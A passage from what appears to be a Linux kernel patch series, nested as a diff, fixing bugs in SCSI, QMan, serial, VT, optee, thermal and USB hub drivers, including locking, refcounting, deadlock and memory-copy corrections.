+index 5a5beb41786ed..043cfa10c7167 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -1079,6 +1079,16 @@ void qlt_free_session_done(struct work_struct *work)
+ 		    "%s: sess %p logout completed\n", __func__, sess);
+ 	}
+ 
++	/* check for any straggling io left behind */
++	if (!(sess->flags & FCF_FCP2_DEVICE) &&
++	    qla2x00_eh_wait_for_pending_commands(sess->vha, sess->d_id.b24, 0, WAIT_TARGET)) {
++		ql_log(ql_log_warn, vha, 0x3027,
++		    "IO not return. Resetting.\n");
++		set_bit(ISP_ABORT_NEEDED, &vha->dpc_flags);
++		qla2xxx_wake_dpc(vha);
++		qla2x00_wait_for_chip_reset(vha);
++	}
++
+ 	if (sess->logo_ack_needed) {
+ 		sess->logo_ack_needed = 0;
+ 		qla24xx_async_notify_ack(vha, sess,
+diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
+index bab00b65bc9d1..852d509b19b2b 100644
+--- a/drivers/scsi/scsi_scan.c
++++ b/drivers/scsi/scsi_scan.c
+@@ -1611,6 +1611,40 @@ int scsi_add_device(struct Scsi_Host *host, uint channel,
+ }
+ EXPORT_SYMBOL(scsi_add_device);
+ 
++int scsi_resume_device(struct scsi_device *sdev)
++{
++	struct device *dev = &sdev->sdev_gendev;
++	int ret = 0;
++
++	device_lock(dev);
++
++	/*
++	 * Bail out if the device or its queue are not running. Otherwise,
++	 * the rescan may block waiting for commands to be executed, with us
++	 * holding the device lock. This can result in a potential deadlock
++	 * in the power management core code when system resume is on-going.
++	 */
++	if (sdev->sdev_state != SDEV_RUNNING ||
++	    blk_queue_pm_only(sdev->request_queue)) {
++		ret = -EWOULDBLOCK;
++		goto unlock;
++	}
++
++	if (dev->driver && try_module_get(dev->driver->owner)) {
++		struct scsi_driver *drv = to_scsi_driver(dev->driver);
++
++		if (drv->resume)
++			ret = drv->resume(dev);
++		module_put(dev->driver->owner);
++	}
++
++unlock:
++	device_unlock(dev);
++
++	return ret;
++}
++EXPORT_SYMBOL(scsi_resume_device);
++
+ int scsi_rescan_device(struct scsi_device *sdev)
+ {
+ 	struct device *dev = &sdev->sdev_gendev;
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 4433b02c8935f..c793bca882236 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -110,6 +110,7 @@ static int sd_suspend_system(struct device *);
+ static int sd_suspend_runtime(struct device *);
+ static int sd_resume_system(struct device *);
+ static int sd_resume_runtime(struct device *);
++static int sd_resume(struct device *);
+ static void sd_rescan(struct device *);
+ static blk_status_t sd_init_command(struct scsi_cmnd *SCpnt);
+ static void sd_uninit_command(struct scsi_cmnd *SCpnt);
+@@ -691,6 +692,7 @@ static struct scsi_driver sd_template = {
+ 		.pm		= &sd_pm_ops,
+ 	},
+ 	.rescan			= sd_rescan,
++	.resume			= sd_resume,
+ 	.init_command		= sd_init_command,
+ 	.uninit_command		= sd_uninit_command,
+ 	.done			= sd_done,
+@@ -3830,7 +3832,22 @@ static int sd_suspend_runtime(struct device *dev)
+ 	return sd_suspend_common(dev, true);
+ }
+ 
+-static int sd_resume(struct device *dev, bool runtime)
++static int sd_resume(struct device *dev)
++{
++	struct scsi_disk *sdkp = dev_get_drvdata(dev);
++
++	if (sdkp->device->no_start_on_resume)
++		sd_printk(KERN_NOTICE, sdkp, "Starting disk\n");
++
++	if (opal_unlock_from_suspend(sdkp->opal_dev)) {
++		sd_printk(KERN_NOTICE, sdkp, "OPAL unlock failed\n");
++		return -EIO;
++	}
++
++	return 0;
++}
++
++static int sd_resume_common(struct device *dev, bool runtime)
+ {
+ 	struct scsi_disk *sdkp = dev_get_drvdata(dev);
+ 	int ret = 0;
+@@ -3849,7 +3866,7 @@ static int sd_resume(struct device *dev, bool runtime)
+ 	}
+ 
+ 	if (!ret) {
+-		opal_unlock_from_suspend(sdkp->opal_dev);
++		sd_resume(dev);
+ 		sdkp->suspended = false;
+ 	}
+ 
+@@ -3868,7 +3885,7 @@ static int sd_resume_system(struct device *dev)
+ 		return 0;
+ 	}
+ 
+-	return sd_resume(dev, false);
++	return sd_resume_common(dev, false);
+ }
+ 
+ static int sd_resume_runtime(struct device *dev)
+@@ -3892,7 +3909,7 @@ static int sd_resume_runtime(struct device *dev)
+ 				  "Failed to clear sense data\n");
+ 	}
+ 
+-	return sd_resume(dev, true);
++	return sd_resume_common(dev, true);
+ }
+ 
+ /**
+diff --git a/drivers/slimbus/core.c b/drivers/slimbus/core.c
+index 219483b79c09c..37fd655994ef3 100644
+--- a/drivers/slimbus/core.c
++++ b/drivers/slimbus/core.c
+@@ -436,8 +436,8 @@ static int slim_device_alloc_laddr(struct slim_device *sbdev,
+ 		if (ret < 0)
+ 			goto err;
+ 	} else if (report_present) {
+-		ret = ida_simple_get(&ctrl->laddr_ida,
+-				     0, SLIM_LA_MANAGER - 1, GFP_KERNEL);
++		ret = ida_alloc_max(&ctrl->laddr_ida,
++				    SLIM_LA_MANAGER - 1, GFP_KERNEL);
+ 		if (ret < 0)
+ 			goto err;
+ 
+diff --git a/drivers/soc/fsl/qbman/qman.c b/drivers/soc/fsl/qbman/qman.c
+index 739e4eee6b75c..7e9074519ad22 100644
+--- a/drivers/soc/fsl/qbman/qman.c
++++ b/drivers/soc/fsl/qbman/qman.c
+@@ -991,7 +991,7 @@ struct qman_portal {
+ 	/* linked-list of CSCN handlers. */
+ 	struct list_head cgr_cbs;
+ 	/* list lock */
+-	spinlock_t cgr_lock;
++	raw_spinlock_t cgr_lock;
+ 	struct work_struct congestion_work;
+ 	struct work_struct mr_work;
+ 	char irqname[MAX_IRQNAME];
+@@ -1281,7 +1281,7 @@ static int qman_create_portal(struct qman_portal *portal,
+ 		/* if the given mask is NULL, assume all CGRs can be seen */
+ 		qman_cgrs_fill(&portal->cgrs[0]);
+ 	INIT_LIST_HEAD(&portal->cgr_cbs);
+-	spin_lock_init(&portal->cgr_lock);
++	raw_spin_lock_init(&portal->cgr_lock);
+ 	INIT_WORK(&portal->congestion_work, qm_congestion_task);
+ 	INIT_WORK(&portal->mr_work, qm_mr_process_task);
+ 	portal->bits = 0;
+@@ -1456,11 +1456,14 @@ static void qm_congestion_task(struct work_struct *work)
+ 	union qm_mc_result *mcr;
+ 	struct qman_cgr *cgr;
+ 
+-	spin_lock(&p->cgr_lock);
++	/*
++	 * FIXME: QM_MCR_TIMEOUT is 10ms, which is too long for a raw spinlock!
++	 */
++	raw_spin_lock_irq(&p->cgr_lock);
+ 	qm_mc_start(&p->p);
+ 	qm_mc_commit(&p->p, QM_MCC_VERB_QUERYCONGESTION);
+ 	if (!qm_mc_result_timeout(&p->p, &mcr)) {
+-		spin_unlock(&p->cgr_lock);
++		raw_spin_unlock_irq(&p->cgr_lock);
+ 		dev_crit(p->config->dev, "QUERYCONGESTION timeout\n");
+ 		qman_p_irqsource_add(p, QM_PIRQ_CSCI);
+ 		return;
+@@ -1476,7 +1479,7 @@ static void qm_congestion_task(struct work_struct *work)
+ 	list_for_each_entry(cgr, &p->cgr_cbs, node)
+ 		if (cgr->cb && qman_cgrs_get(&c, cgr->cgrid))
+ 			cgr->cb(p, cgr, qman_cgrs_get(&rr, cgr->cgrid));
+-	spin_unlock(&p->cgr_lock);
++	raw_spin_unlock_irq(&p->cgr_lock);
+ 	qman_p_irqsource_add(p, QM_PIRQ_CSCI);
+ }
+ 
+@@ -2440,7 +2443,7 @@ int qman_create_cgr(struct qman_cgr *cgr, u32 flags,
+ 	preempt_enable();
+ 
+ 	cgr->chan = p->config->channel;
+-	spin_lock(&p->cgr_lock);
++	raw_spin_lock_irq(&p->cgr_lock);
+ 
+ 	if (opts) {
+ 		struct qm_mcc_initcgr local_opts = *opts;
+@@ -2477,7 +2480,7 @@ int qman_create_cgr(struct qman_cgr *cgr, u32 flags,
+ 	    qman_cgrs_get(&p->cgrs[1], cgr->cgrid))
+ 		cgr->cb(p, cgr, 1);
+ out:
+-	spin_unlock(&p->cgr_lock);
++	raw_spin_unlock_irq(&p->cgr_lock);
+ 	put_affine_portal();
+ 	return ret;
+ }
+@@ -2512,7 +2515,7 @@ int qman_delete_cgr(struct qman_cgr *cgr)
+ 		return -EINVAL;
+ 
+ 	memset(&local_opts, 0, sizeof(struct qm_mcc_initcgr));
+-	spin_lock_irqsave(&p->cgr_lock, irqflags);
++	raw_spin_lock_irqsave(&p->cgr_lock, irqflags);
+ 	list_del(&cgr->node);
+ 	/*
+ 	 * If there are no other CGR objects for this CGRID in the list,
+@@ -2537,7 +2540,7 @@ int qman_delete_cgr(struct qman_cgr *cgr)
+ 		/* add back to the list */
+ 		list_add(&cgr->node, &p->cgr_cbs);
+ release_lock:
+-	spin_unlock_irqrestore(&p->cgr_lock, irqflags);
++	raw_spin_unlock_irqrestore(&p->cgr_lock, irqflags);
+ 	put_affine_portal();
+ 	return ret;
+ }
+@@ -2577,9 +2580,9 @@ static int qman_update_cgr(struct qman_cgr *cgr, struct qm_mcc_initcgr *opts)
+ 	if (!p)
+ 		return -EINVAL;
+ 
+-	spin_lock_irqsave(&p->cgr_lock, irqflags);
++	raw_spin_lock_irqsave(&p->cgr_lock, irqflags);
+ 	ret = qm_modify_cgr(cgr, 0, opts);
+-	spin_unlock_irqrestore(&p->cgr_lock, irqflags);
++	raw_spin_unlock_irqrestore(&p->cgr_lock, irqflags);
+ 	put_affine_portal();
+ 	return ret;
+ }
+diff --git a/drivers/staging/media/ipu3/ipu3-v4l2.c b/drivers/staging/media/ipu3/ipu3-v4l2.c
+index e530767e80a5d..55cc44a401bc4 100644
+--- a/drivers/staging/media/ipu3/ipu3-v4l2.c
++++ b/drivers/staging/media/ipu3/ipu3-v4l2.c
+@@ -1069,6 +1069,11 @@ static int imgu_v4l2_subdev_register(struct imgu_device *imgu,
+ 	struct imgu_media_pipe *imgu_pipe = &imgu->imgu_pipe[pipe];
+ 
+ 	/* Initialize subdev media entity */
++	imgu_sd->subdev.entity.ops = &imgu_media_ops;
++	for (i = 0; i < IMGU_NODE_NUM; i++) {
++		imgu_sd->subdev_pads[i].flags = imgu_pipe->nodes[i].output ?
++			MEDIA_PAD_FL_SINK : MEDIA_PAD_FL_SOURCE;
++	}
+ 	r = media_entity_pads_init(&imgu_sd->subdev.entity, IMGU_NODE_NUM,
+ 				   imgu_sd->subdev_pads);
+ 	if (r) {
+@@ -1076,11 +1081,6 @@ static int imgu_v4l2_subdev_register(struct imgu_device *imgu,
+ 			"failed initialize subdev media entity (%d)\n", r);
+ 		return r;
+ 	}
+-	imgu_sd->subdev.entity.ops = &imgu_media_ops;
+-	for (i = 0; i < IMGU_NODE_NUM; i++) {
+-		imgu_sd->subdev_pads[i].flags = imgu_pipe->nodes[i].output ?
+-			MEDIA_PAD_FL_SINK : MEDIA_PAD_FL_SOURCE;
+-	}
+ 
+ 	/* Initialize subdev */
+ 	v4l2_subdev_init(&imgu_sd->subdev, &imgu_subdev_ops);
+@@ -1177,15 +1177,15 @@ static int imgu_v4l2_node_setup(struct imgu_device *imgu, unsigned int pipe,
+ 	}
+ 
+ 	/* Initialize media entities */
++	node->vdev_pad.flags = node->output ?
++		MEDIA_PAD_FL_SOURCE : MEDIA_PAD_FL_SINK;
++	vdev->entity.ops = NULL;
+ 	r = media_entity_pads_init(&vdev->entity, 1, &node->vdev_pad);
+ 	if (r) {
+ 		dev_err(dev, "failed initialize media entity (%d)\n", r);
+ 		mutex_destroy(&node->lock);
+ 		return r;
+ 	}
+-	node->vdev_pad.flags = node->output ?
+-		MEDIA_PAD_FL_SOURCE : MEDIA_PAD_FL_SINK;
+-	vdev->entity.ops = NULL;
+ 
+ 	/* Initialize vbq */
+ 	vbq->type = node->vdev_fmt.type;
+diff --git a/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c b/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
+index cb921c94996a1..90eb4c5936f38 100644
+--- a/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
++++ b/drivers/staging/vc04_services/vchiq-mmal/mmal-vchiq.c
+@@ -938,8 +938,9 @@ static int create_component(struct vchiq_mmal_instance *instance,
+ 	/* build component create message */
+ 	m.h.type = MMAL_MSG_TYPE_COMPONENT_CREATE;
+ 	m.u.component_create.client_component = component->client_component;
+-	strncpy(m.u.component_create.name, name,
+-		sizeof(m.u.component_create.name));
++	strscpy_pad(m.u.component_create.name, name,
++		    sizeof(m.u.component_create.name));
++	m.u.component_create.pid = 0;
+ 
+ 	ret = send_synchronous_mmal_msg(instance, &m,
+ 					sizeof(m.u.component_create),
+diff --git a/drivers/tee/optee/device.c b/drivers/tee/optee/device.c
+index 4b10921276942..1892e49a8e6a6 100644
+--- a/drivers/tee/optee/device.c
++++ b/drivers/tee/optee/device.c
+@@ -90,13 +90,14 @@ static int optee_register_device(const uuid_t *device_uuid, u32 func)
+ 	if (rc) {
+ 		pr_err("device registration failed, err: %d\n", rc);
+ 		put_device(&optee_device->dev);
++		return rc;
+ 	}
+ 
+ 	if (func == PTA_CMD_GET_DEVICES_SUPP)
+ 		device_create_file(&optee_device->dev,
+ 				   &dev_attr_need_supplicant);
+ 
+-	return rc;
++	return 0;
+ }
+ 
+ static int __optee_enumerate_devices(u32 func)
+diff --git a/drivers/thermal/devfreq_cooling.c b/drivers/thermal/devfreq_cooling.c
+index 24b474925cd68..0b424bc8cadfd 100644
+--- a/drivers/thermal/devfreq_cooling.c
++++ b/drivers/thermal/devfreq_cooling.c
+@@ -201,7 +201,7 @@ static int devfreq_cooling_get_requested_power(struct thermal_cooling_device *cd
+ 
+ 		res = dfc->power_ops->get_real_power(df, power, freq, voltage);
+ 		if (!res) {
+-			state = dfc->capped_state;
++			state = dfc->max_state - dfc->capped_state;
+ 
+ 			/* Convert EM power into milli-Watts first */
+ 			dfc->res_util = dfc->em_pd->table[state].power;
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 8efe31448df3c..c744feabd7cdd 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1377,9 +1377,6 @@ static void autoconfig_irq(struct uart_8250_port *up)
+ 		inb_p(ICP);
+ 	}
+ 
+-	if (uart_console(port))
+-		console_lock();
+-
+ 	/* forget possible initially masked and pending IRQ */
+ 	probe_irq_off(probe_irq_on());
+ 	save_mcr = serial8250_in_MCR(up);
+@@ -1410,9 +1407,6 @@ static void autoconfig_irq(struct uart_8250_port *up)
+ 	if (port->flags & UPF_FOURPORT)
+ 		outb_p(save_ICP, ICP);
+ 
+-	if (uart_console(port))
+-		console_unlock();
+-
+ 	port->irq = (irq > 0) ? irq : 0;
+ }
+ 
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index c5a9b89c4d313..f94c782638686 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2213,9 +2213,12 @@ lpuart32_set_termios(struct uart_port *port, struct ktermios *termios,
+ 
+ 	lpuart32_write(&sport->port, bd, UARTBAUD);
+ 	lpuart32_serial_setbrg(sport, baud);
+-	lpuart32_write(&sport->port, modem, UARTMODIR);
+-	lpuart32_write(&sport->port, ctrl, UARTCTRL);
++	/* disable CTS before enabling UARTCTRL_TE to avoid pending idle preamble */
++	lpuart32_write(&sport->port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
+ 	/* restore control register */
++	lpuart32_write(&sport->port, ctrl, UARTCTRL);
++	/* re-enable the CTS if needed */
++	lpuart32_write(&sport->port, modem, UARTMODIR);
+ 
+ 	if ((ctrl & (UARTCTRL_PE | UARTCTRL_M)) == UARTCTRL_PE)
+ 		sport->is_cs7 = true;
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index f8962a3d44216..573bf7e9b7978 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -496,8 +496,7 @@ static void imx_uart_stop_tx(struct uart_port *port)
+ 	}
+ }
+ 
+-/* called with port.lock taken and irqs off */
+-static void imx_uart_stop_rx(struct uart_port *port)
++static void imx_uart_stop_rx_with_loopback_ctrl(struct uart_port *port, bool loopback)
+ {
+ 	struct imx_port *sport = (struct imx_port *)port;
+ 	u32 ucr1, ucr2, ucr4, uts;
+@@ -519,7 +518,7 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	/* See SER_RS485_ENABLED/UTS_LOOP comment in imx_uart_probe() */
+ 	if (port->rs485.flags & SER_RS485_ENABLED &&
+ 	    port->rs485.flags & SER_RS485_RTS_ON_SEND &&
+-	    sport->have_rtscts && !sport->have_rtsgpio) {
++	    sport->have_rtscts && !sport->have_rtsgpio && loopback) {
+ 		uts = imx_uart_readl(sport, imx_uart_uts_reg(sport));
+ 		uts |= UTS_LOOP;
+ 		imx_uart_writel(sport, uts, imx_uart_uts_reg(sport));
+@@ -531,6 +530,16 @@ static void imx_uart_stop_rx(struct uart_port *port)
+ 	imx_uart_writel(sport, ucr2, UCR2);
+ }
+ 
++/* called with port.lock taken and irqs off */
++static void imx_uart_stop_rx(struct uart_port *port)
++{
++	/*
++	 * Stop RX and enable loopback in order to make sure RS485 bus
++	 * is not blocked. Se comment in imx_uart_probe().
++	 */
++	imx_uart_stop_rx_with_loopback_ctrl(port, true);
++}
++
+ /* called with port.lock taken and irqs off */
+ static void imx_uart_enable_ms(struct uart_port *port)
+ {
+@@ -719,8 +728,13 @@ static void imx_uart_start_tx(struct uart_port *port)
+ 				imx_uart_rts_inactive(sport, &ucr2);
+ 			imx_uart_writel(sport, ucr2, UCR2);
+ 
++			/*
++			 * Since we are about to transmit we can not stop RX
++			 * with loopback enabled because that will make our
++			 * transmitted data being just looped to RX.
++			 */
+ 			if (!(port->rs485.flags & SER_RS485_RX_DURING_TX))
+-				imx_uart_stop_rx(port);
++				imx_uart_stop_rx_with_loopback_ctrl(port, false);
+ 
+ 			sport->tx_state = WAIT_AFTER_RTS;
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 444f89eb2d4b7..d409ef3887212 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -1633,13 +1633,16 @@ static unsigned short max310x_i2c_slave_addr(unsigned short addr,
+ 
+ static int max310x_i2c_probe(struct i2c_client *client)
+ {
+-	const struct max310x_devtype *devtype =
+-			device_get_match_data(&client->dev);
++	const struct max310x_devtype *devtype;
+ 	struct i2c_client *port_client;
+ 	struct regmap *regmaps[4];
+ 	unsigned int i;
+ 	u8 port_addr;
+ 
++	devtype = device_get_match_data(&client->dev);
++	if (!devtype)
++		return dev_err_probe(&client->dev, -ENODEV, "Failed to match device\n");
++
+ 	if (client->addr < devtype->slave_addr.min ||
+ 		client->addr > devtype->slave_addr.max)
+ 		return dev_err_probe(&client->dev, -EINVAL,
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index f0ed30d0a697c..fe3f1d655dfe2 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -2561,7 +2561,12 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 			port->type = PORT_UNKNOWN;
+ 			flags |= UART_CONFIG_TYPE;
+ 		}
++		/* Synchronize with possible boot console. */
++		if (uart_console(port))
++			console_lock();
+ 		port->ops->config_port(port, flags);
++		if (uart_console(port))
++			console_unlock();
+ 	}
+ 
+ 	if (port->type != PORT_UNKNOWN) {
+@@ -2569,6 +2574,10 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 
+ 		uart_report_port(drv, port);
+ 
++		/* Synchronize with possible boot console. */
++		if (uart_console(port))
++			console_lock();
++
+ 		/* Power up port for set_mctrl() */
+ 		uart_change_pm(state, UART_PM_STATE_ON);
+ 
+@@ -2585,6 +2594,9 @@ uart_configure_port(struct uart_driver *drv, struct uart_state *state,
+ 
+ 		uart_rs485_config(port);
+ 
++		if (uart_console(port))
++			console_unlock();
++
+ 		/*
+ 		 * If this driver supports console, and it hasn't been
+ 		 * successfully registered yet, try to re-register it.
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 9e30ef2b6eb8c..48a9ed7c93c97 100644
+--- a/drivers/tty/vt/vt.c
++++ b/drivers/tty/vt/vt.c
+@@ -398,7 +398,7 @@ static void vc_uniscr_delete(struct vc_data *vc, unsigned int nr)
+ 		char32_t *ln = uniscr->lines[vc->state.y];
+ 		unsigned int x = vc->state.x, cols = vc->vc_cols;
+ 
+-		memcpy(&ln[x], &ln[x + nr], (cols - x - nr) * sizeof(*ln));
++		memmove(&ln[x], &ln[x + nr], (cols - x - nr) * sizeof(*ln));
+ 		memset32(&ln[cols - nr], ' ', nr);
+ 	}
+ }
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index 1f0951be15ab7..fdc1a66b129a4 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -485,6 +485,7 @@ static ssize_t wdm_write
+ static int service_outstanding_interrupt(struct wdm_device *desc)
+ {
+ 	int rv = 0;
++	int used;
+ 
+ 	/* submit read urb only if the device is waiting for it */
+ 	if (!desc->resp_count || !--desc->resp_count)
+@@ -499,7 +500,10 @@ static int service_outstanding_interrupt(struct wdm_device *desc)
+ 		goto out;
+ 	}
+ 
+-	set_bit(WDM_RESPONDING, &desc->flags);
++	used = test_and_set_bit(WDM_RESPONDING, &desc->flags);
++	if (used)
++		goto out;
++
+ 	spin_unlock_irq(&desc->iuspin);
+ 	rv = usb_submit_urb(desc->response, GFP_KERNEL);
+ 	spin_lock_irq(&desc->iuspin);
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index d960a56b760ec..b1fb04e5247c3 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -123,7 +123,6 @@ EXPORT_SYMBOL_GPL(ehci_cf_port_reset_rwsem);
+ #define HUB_DEBOUNCE_STEP	  25
+ #define HUB_DEBOUNCE_STABLE	 100
+ 
+-static void hub_release(struct kref *kref);
+ static int usb_reset_and_verify_device(struct usb_device *udev);
+ static int hub_port_disable(struct usb_hub *hub, int port1, int set_state);
+ static bool hub_port_warm_reset_required(struct usb_hub *hub, int port1,
+@@ -685,14 +684,14 @@ static void kick_hub_wq(struct usb_hub *hub)
+ 	 */
+ 	intf = to_usb_interface(hub->intfdev);
+ 	usb_autopm_get_interface_no_resume(intf);
+-	kref_get(&hub->kref);
++	hub_get(hub);
+ 
+ 	if (queue_work(hub_wq, &hub->events))
+ 		return;
+ 
+ 	/* the work has already been scheduled */
+ 	usb_autopm_put_interface_async(intf);
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ void usb_kick_hub_wq(struct usb_device *hdev)
+@@ -1060,7 +1059,7 @@ static void hub_activate(struct usb_hub *hub, enum hub_activation_type type)
+ 			goto init2;
+ 		goto init3;
+ 	}
+-	kref_get(&hub->kref);
++	hub_get(hub);
+ 
+ 	/* The superspeed hub except for root hub has to use Hub Depth
+ 	 * value as an offset into the route string to locate the bits
+@@ -1308,7 +1307,7 @@ static void hub_activate(struct usb_hub *hub, enum hub_activation_type type)
+ 		device_unlock(&hdev->dev);
+ 	}
+ 
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ /* Implement the continuations for the delays above */
+@@ -1724,6 +1723,16 @@ static void hub_release(struct kref *kref)
+ 	kfree(hub);
+ }
+ 
++void hub_get(struct usb_hub *hub)
++{
++	kref_get(&hub->kref);
++}
++
++void hub_put(struct usb_hub *hub)
++{
++	kref_put(&hub->kref, hub_release);
++}
++
+ static unsigned highspeed_hubs;
+ 
+ static void hub_disconnect(struct usb_interface *intf)
+@@ -1772,7 +1781,7 @@ static void hub_disconnect(struct usb_interface *intf)
+ 
+ 	onboard_hub_destroy_pdevs(&hub->onboard_hub_devs);
+ 
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ }
+ 
+ static bool hub_descriptor_is_sane(struct usb_host_interface *desc)
+@@ -5874,7 +5883,7 @@ static void hub_event(struct work_struct *work)
+ 
+ 	/* Balance the stuff in kick_hub_wq() and allow autosuspend */
+ 	usb_autopm_put_interface(intf);
+-	kref_put(&hub->kref, hub_release);
++	hub_put(hub);
+ 
+ 	kcov_remote_stop();
+ }
+diff --git a/drivers/usb/core/hub.h b/drivers/usb/core/hub.h
+index bc66205ca52c3..1085c72335d5c 100644
+--- a/drivers/usb/core/hub.h
++++ b/drivers/usb/core/hub.h
+@@ -118,6 +118,8 @@ extern void usb_hub_remove_port_device(struct usb_hub *hub,
+ extern int usb_hub_set_port_power(struct usb_device *hdev, struct usb_hub *hub,
+ 		int port1, bool set);
+ extern struct usb_hub *usb_hub_to_struct_hub(struct usb_device *hdev);
++extern void hub_get(struct usb_hub *hub);
++extern void hub_put(struct usb_hub *hub);
+ extern int hub_port_debounce(struct usb_hub *hub, int port1,
+ 		bool must_be_connected);
+ extern int usb_clear_port_feature(struct usb_device *hdev,
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index 38c1a4f4fdeae..e91fa567d08d2 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -28,11 +28,22 @@ static ssize_t disable_show(struct device *dev,
+ 	u16 portstatus, unused;
+ 	bool disabled;
+ 	int rc;
++	struct kernfs_node *kn;
+ 
++	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+-		return rc;
++		goto out_hub_get;
+ 
++	/*
++	 * Prevent deadlock if another process is concurrently
++	 * trying to unregister hdev.
++	 */
++	kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++	if (!kn) {
++		rc = -ENODEV;
++		goto out_autopm;
++	}
+ 	usb_lock_device(hdev);
+ 	if (hub->disconnected) {
+ 		rc = -ENODEV;
+@@ -42,9 +53,13 @@ static ssize_t disable_show(struct device *dev,
+ 	usb_hub_port_status(hub, port1, &portstatus, &unused);
+ 	disabled = !usb_port_is_power_on(hub, portstatus);
+ 
+-out_hdev_lock:
++ out_hdev_lock:
+ 	usb_unlock_device(hdev);
++	sysfs_unbreak_active_protection(kn);
++ out_autopm:
+ 	usb_autopm_put_interface(intf);
++ out_hub_get:
++	hub_put(hub);
+ 
+ 	if (rc)
+ 		return rc;
+@@ -62,15 +77,26 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	int port1 = port_dev->portnum;
+ 	bool disabled;
+ 	int rc;
++	struct kernfs_node *kn;
+ 
+ 	rc = strtobool(buf, &disabled);
+ 	if (rc)
+ 		return rc;
+ 
++	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+-		return rc;
++		goto out_hub_get;
+ 
++	/*
++	 * Prevent deadlock if another process is concurrently
++	 * trying to unregister hdev.
++	 */
++	kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++	if (!kn) {
++		rc = -ENODEV;
++		goto out_autopm;
++	}
+ 	usb_lock_device(hdev);
+ 	if (hub->disconnected) {
+ 		rc = -ENODEV;
+@@ -91,9 +117,13 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	if (!rc)
+ 		rc = count;
+ 
+-out_hdev_lock:
++ out_hdev_lock:
+ 	usb_unlock_device(hdev);
++	sysfs_unbreak_active_protection(kn);
++ out_autopm:
+ 	usb_autopm_put_interface(intf);
++ out_hub_get:
++	hub_put(hub);
+ 
+ 	return rc;
+ }
+@@ -534,7 +564,7 @@ static int match_location(struct usb_device *peer_hdev, void *p)
+ 	struct usb_hub *peer_hub = usb_hub_to_struct_hub(peer_hdev);
+ 	struct usb_device *hdev = to_usb_device(port_dev->dev.parent->parent);
+ 
+-	if (!peer_hub)
++	if (!peer_hub || port_dev->connect_type == USB_PORT_NOT_USED)
+ 		return 0;
+ 
+ 	hcd = bus_to_hcd(hdev->bus);
+@@ -545,7 +575,8 @@ static int match_location(struct usb_device *peer_hdev, void *p)
+ 
+ 	for (port1 = 1; port1 <= peer_hdev->maxchild; port1++) {
+ 		peer = peer_hub->ports[port1 - 1];
+-		if (peer && peer->location == port_dev->location) {
++		if (peer && peer->connect_type != USB_PORT_NOT_USED &&
++		    peer->location == port_dev->location) {
+ 			link_peers_report(port_dev, peer);
+ 			return 1; /* done */
+ 		}
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index ccf6cd9722693..5f1e07341f363 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -1170,14 +1170,24 @@ static ssize_t interface_authorized_store(struct device *dev,
+ {
+ 	struct usb_interface *intf = to_usb_interface(dev);
+ 	bool val;
++	struct kernfs_node *kn;
+ 
+ 	if (strtobool(buf, &val) != 0)
+ 		return -EINVAL;
+ 
+-	if (val)
++	if (val) {
+ 		usb_authorize_interface(intf);
+-	else
+-		usb_deauthorize_interface(intf);
++	} else {
++		/*
++		 * Prevent deadlock if another process is concurrently
++		 * trying to unregister intf.
++		 */
++		kn = sysfs_break_active_protection(&dev->kobj, &attr->attr);
++		if (kn) {
++			usb_deauthorize_interface(intf);
++			sysfs_unbreak_active_protection(kn);
++		}
++	}
+ 
+ 	return count;
+ }
+diff --git a/drivers/usb/dwc2/core.h b/drivers/usb/dwc2/core.h
+index 40cf2880d7e59..b106c0e0b77ba 100644
+--- a/drivers/usb/dwc2/core.h
++++ b/drivers/usb/dwc2/core.h
